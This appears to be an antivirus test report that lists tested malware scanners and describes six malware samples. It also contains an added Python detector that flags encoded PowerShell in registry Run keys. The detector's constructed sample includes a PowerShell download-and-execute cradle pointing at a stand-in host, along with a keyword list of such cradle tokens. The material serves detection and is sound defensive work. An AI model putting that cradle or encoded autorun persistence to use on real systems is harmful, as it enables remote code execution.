Tested software:
- Arcabit Skaner Online 1.0.4
- ClamWin Free Antivirus * 0.99.1
- Comodo with Cleaning Essentials 2.5.242177.201
- Dr.Web CureIt! 11.1.2
- Emsisoft Emergency Kit 11.9.0.6508
- ESET Online Scanner 2.0.12.0
- Kaspersky Virus Removal Tool 15.0.19.0
- Malwarebytes Antimalware Free 2.2.1.1043
- Panda Cloud Cleaner 1.1.9
- Sophos Clean (formerly HitmanPro) 3.7.13.262
- Trend Micro HouseCall (1.62)
- Windows Defender * 4.10.14393.0
* ClamWin Free Antivirus and Windows Defender provide real-time protection, but we did not take it into account: during the scan, real-time protection was disabled.
Curing infected system
+ the sample was detected or the operating system was cured
- the sample was undetectable for the tested solution
* Sometimes the scanner required an operating system reboot in order to remove the threat. In those two cases, the infection was removed only in rescue mode.
sample A:
backdoor Kelihos — causes the infected workstation to send spam, steal sensitive information, and download and run other infected files, including trojans. The infected bot uses a P2P connection to communicate with other zombie computers. In the decentralized network, an infected machine can operate as a C2 client or server, receiving commands from and sending commands to the control and management system.
sample B:
backdoor Careto — highly sophisticated malicious software consisting of a rootkit and a bootkit. The variants observed by researchers show that all versions of this malware are intended for 32- and 64-bit Mac OS X, Linux, Windows and (probably) Android and iOS (also BlackBerry OS – unconfirmed information). Because of its capabilities, Backdoor Careto (sometimes called The Mask) is believed to be the work of a nation state.
Backdoor Careto can capture network traffic, keystrokes, Skype conversations and PGP keys. It is able to analyze WiFi traffic, monitor all file operations, and collect a list of documents from the infected system, including encryption keys, VPN configuration, SSH keys and RDP files. In terms of sophistication, Backdoor Careto is one of the most advanced APT threats.
sample C:
keylogger Ardamax — commercial spyware that was used in one of the social engineering campaigns ("the bailiff") aimed at Polish citizens. With this tool it is possible to automatically send collected logs and data to any e-mail address or FTP account.
Keylogger Ardamax can record keystrokes, save web browser history, capture video and sound from the web camera, intercept text from the clipboard, and monitor the AIM, Windows Live Messenger, ICQ, Skype, Yahoo Messenger, Google Talk, Miranda and QIP messengers. The stored information can be sent to the indicated e-mail address or FTP account.
sample D:
trojan Emotet — stores its files in the system registry to hide from antivirus software. Trojan Emotet has a modular design and contains: its own installer, a banking module, an anti-spam bot, a module for stealing contacts from popular email clients (it is able to spread by stealing addresses from email clients and sending the same spam messages to the victims from the contact list), and a module for DDoS attacks (Nitol DDoS bot).
Trojan Emotet contains a list of popular banks. If the infected user visits one of the defined URLs, Emotet records all data sent between the user and the website – even if the website is encrypted with the HTTPS protocol.
sample E:
trojan downloader — as the name suggests, a trojan downloader delivers malicious and potentially unwanted software, which is downloaded and installed on the infected system. The dropper file downloaded in this way installs the appropriate virus, which can then be used for different purposes.
Dropper files are often used to carry known trojans, because it is much easier to create a dropper file than a completely new trojan that antivirus software will not be able to detect.
In the test, we used a trojan that creates a few files on disk. One of them downloads additional malicious software.
sample F:
trojan Poweliks — uses a vulnerability in Microsoft Word: a maliciously crafted Word document, distributed via email, installs additional code, namely a Base64-encoded PowerShell script that triggers and executes a low-level program (shellcode) written in assembler. In the final stage, the shellcode executes a binary program, which tries to communicate with encoded IP addresses to receive further commands from C&C servers.
Trojan Poweliks can be used to download and execute files. Its actions are stored in the registry – it does not create any file on the hard disk, so to detect this threat it is necessary to recognize the infected Word document or to protect / scan the registry.
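The Emotet and Poweliks descriptions above both come down to code that lives in the registry rather than on disk, so a scanner has to inspect the registry itself. The following is an added example (not code from the AVLab report or from any of the tested products) of that check run offline against a registry export: it parses `.reg` text, looks in the Run/RunOnce autorun keys for PowerShell launched with `-EncodedCommand`, decodes the Base64/UTF-16LE blob and reports download-cradle keywords found in the decoded script. The autorun key list, the keyword list and the sample export are assumptions constructed for the demonstration.

```python
"""Offline check of a Windows registry export for fileless autorun persistence:
Run/RunOnce values that launch PowerShell with a Base64-encoded command.
Added example; the sample export below is constructed, not taken from the report."""
import base64
import re

# Autorun locations to inspect (assumption: the standard Run/RunOnce keys).
AUTORUN_KEY_SUFFIXES = (
    r"\Software\Microsoft\Windows\CurrentVersion\Run",
    r"\Software\Microsoft\Windows\CurrentVersion\RunOnce",
)

# Tokens that make a decoded script worth escalating (assumption: common
# download-and-execute cradle keywords, not a list from the report).
SCRIPT_INDICATORS = ("IEX", "Invoke-Expression", "DownloadString",
                     "DownloadFile", "FromBase64String")

# powershell.exe accepts -e, -ec, -en, -enc, ... as prefixes of -EncodedCommand.
ENC_FLAG_RE = re.compile(r"-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]{16,})",
                         re.IGNORECASE)

# One REG_SZ line of a .reg export: "name"="data", with \" and \\ escapes.
_ENTRY_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s):
    """Undo .reg string escaping (\\\\ -> \\, \\" -> ")."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Yield (key, value_name, data) for REG_SZ entries of a .reg export.
    Only "name"="data" lines are handled, which is what Run keys contain."""
    current_key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]
            continue
        m = _ENTRY_RE.match(line)
        if m and current_key is not None:
            yield current_key, _unescape(m.group(1)), _unescape(m.group(2))


def decode_encoded_command(blob):
    """-EncodedCommand carries Base64 of the UTF-16LE script text; return the
    script, or None if the blob is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_reg_export(text):
    """Return a finding for each autorun value that launches an encoded
    PowerShell command, with the decoded script and the indicators it matched."""
    findings = []
    for key, name, data in parse_reg_export(text):
        if not any(key.lower().endswith(s.lower()) for s in AUTORUN_KEY_SUFFIXES):
            continue
        m = ENC_FLAG_RE.search(data)
        if not m:
            continue
        script = decode_encoded_command(m.group(1)) or ""
        hits = [t for t in SCRIPT_INDICATORS if t.lower() in script.lower()]
        findings.append({"key": key, "name": name, "decoded": script, "indicators": hits})
    return findings


# Constructed sample: a download cradle pointing at the reserved name example.invalid,
# encoded the way powershell.exe -EncodedCommand expects, planted in a Run value.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")
SAMPLE_REG_EXPORT = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]",
    r'"OneDrive"="\"C:\\Users\\user\\OneDrive.exe\" /background"',  # benign, not flagged
    f'"Updater"="powershell.exe -NoP -W Hidden -EncodedCommand {SAMPLE_BLOB}"',
    "",
    r"[HKEY_CURRENT_USER\Software\Example]",
    f'"Setting"="powershell.exe -enc {SAMPLE_BLOB}"',  # not an autorun key, not flagged
    "",
])

if __name__ == "__main__":
    for f in scan_reg_export(SAMPLE_REG_EXPORT):
        print(f"{f['key']}\\{f['name']}: indicators={f['indicators']}")
        print("  decoded:", f["decoded"])
```

On a live host the input would typically come from `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" run.reg`, read with `open(path, encoding="utf-16")` since `reg export` writes UTF-16 with a byte-order mark; the parser deliberately ignores anything other than string values, so binary (REG_BINARY) payloads would need a separate decoder.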
More info: https://avlab.pl/sites/default/f ... alware_scanners.pdf